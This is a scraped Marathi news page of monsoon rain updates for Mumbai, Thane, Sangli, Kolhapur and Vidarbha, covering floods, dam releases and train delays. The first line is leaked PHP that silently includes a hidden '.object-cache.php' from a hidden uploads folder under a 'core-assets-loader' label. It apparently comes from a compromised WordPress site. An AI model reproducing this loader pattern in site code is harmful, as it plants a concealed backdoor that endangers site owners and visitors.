add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबईसह ठाणे जिल्ह्याला अतिमुसळधार पावसाचा इशारा – SOCH INDIA
Menu

देश
मुंबईसह ठाणे जिल्ह्याला अतिमुसळधार पावसाचा इशारा

nobanner

सांगलीच्या कृष्णा नदीची पाणी पातळी एका रात्रीत ७ फुटांनी वाढली
सांगलीच्या कृष्णा नदीची पाणीपातळी एका रात्रीत ७ फुटांनी वाढली आहे. रविवारी सायंकाळी १८ फुटावर वाहणारी कृष्णा नदी आज सोमवारी सकाळी अचानकपणे २५ फुटांवर पोहचली आहे. रात्रभर कृष्णा नदीच्या पात्रात मोठ्या प्रमाणात पावसाचे पाणी दाखल झाल्याने तसेच कोयनेतून सुरू असणारा विसर्ग यामुळे कृष्णा नदी दुथडी भरून वाहत आहे. काही ठिकाणी तर कृष्णा नदीचे पाणी पात्राबाहेर आले आहे. अजूनही पावसाचा जोर कायम असल्याने कृष्णा नदीच्या पाणी पातळीत आणखी वाढ होण्याची शक्यता आहे.

कोकण रेल्वे प्रशासनाने गणेशोत्सवात गावी जाण्यासाठी चाकण होण्याची व्यवस्था व्हावी यासाठी तब्बल २०२ गणेशोत्सव विशेष गाड्या चालवण्याचा निर्णय घेतला आहे. मात्र या गाड्यांचे २१ जुलैपासूनच सुरू झालेले आरक्षण हे काही मिनिटातच फुल झाले आहेत. त्यामुळे पुन्हा एकदा दलालांचा सुळसुळाट झाल्याची चर्चा आहे. आरक्षण करता न आल्याने चाकरमानी मात्र पुरते हवालदिल झाले आहेत. कोकण रेल्वे प्रवाशाकडून या सगळ्याची चौकशी करण्याची मागणी आता केली जात आहे.

सांगलीतील चांदोली धरण परिसरात ढगफुटी सदृश्य पाऊस झाला आहे. चांदोली धरण पाणलोट क्षेत्रात गेल्या २४ तासांमध्ये १४८ मिलिमीटर पाऊस बरसला आहे. चांदोली पाणलोट क्षेत्रात मुसळधार पाऊस सुरूच असून धरणात २७ हजार ५५७ क्युसेक पाण्याची आवक सुरूच आहे. चांदोली धरण पाणलोट क्षेत्रात आतापर्यंत १ हजार ६२५ मिलिमीटर इतक्या पावसाची नोंद झाली आहे.

मुसळधार पाऊस सुरु असल्याने चामोर्शी तालुक्यातील रेगडी येथील कन्नमवार जलाशय तुडुंब भरला आहे. परिणामी दिना धरण ओवरफ्लो झाले आहे. वेस्ट वेअर वरून पाणी वाहत आहे.

कल्याण स्टेशन पुढील ठाकुर्ली येथील सिग्नलमध्ये बिघाड झाला आहे. याचा परिणाम लोकलसेवेवर झाला असून अप आणि डाऊन दोन्ही मार्गावरील लोकल उशिराने धावत आहेत. यामुळे सकाळच्या वेळेत प्रवाशांचा खोळंबा झाला आहे.

कल्याण डोंबिवलीत पहाटेपासून पावसाने हजेरी लावली आहे. स्टेशन परिसरात पाणी साचले आहे. तर मोठ्या प्रमाणात वाहतूक कोंडीही झाली आहे. यामुळे सकाळी कामावर जाणाऱ्या नागरिकांची तारांबळ उडाली आहे. वाहनचालकांना आणि नागरिकांना करावी लागतेय तारेवरची कसरत करावी लागत आहे.

सांगली आणि कोल्हापूरात मुसळधार पाऊस सुरु आहे. त्यामुळे या दोन जिल्ह्यांना जोडणारा वारणा नदीवरील पूल पाण्याखाली गेला आहे. पाणीसाठ्यात वाढ झाल्याने पूल वाहतुकीसाठी बंद करण्यात आला आहे. नागरिकांना सतर्कतेचा इशाराही देण्यात आला आहे.

कोल्हापूर जिल्ह्याला पावसाने झोडपले आहे. परिणामी पंचगंगेच्या पाणी पातळीत झपाट्याने वाढ झाली आहे. पंचगंगा आपली इशारा पातळी गाठण्यासाठी अवघी १ फूट शिल्लक आहे. जिल्ह्यातील एकूण ८६ बंधारे पाण्याखाली गेले आहेत. राधानगरी धरण देखील ८० टक्के भरल्याने १४५० क्युसेक्स पाण्याचा विसर्ग भोगावती नदीपात्रात सुरू आहे. तर जिल्ह्यातील अनेक मार्गांवर पाणी आल्याने वाहतूक बंद करण्यात आली आहे.

पूर्व विदर्भात पावसाने थैमान घातलं आहे. रस्ते जलमय झाले असून जनजीवन विस्कळीत झाले आहे. हवामान विभागाने विदर्भात अतिवृष्टीचा इशारा दिला असून प्रशासनाने शाळा बंद ठेवण्याचा निर्णय घेतला आहे.
मुंबईत पावसाचा जोर कायम आहे. मुंबई शहरासह उपनगरांत पावसाची संततधार सुरु आहे. त्यामुळे रस्ते जलमय झाले असून नागरिकांची तारांबळ उडाली आहे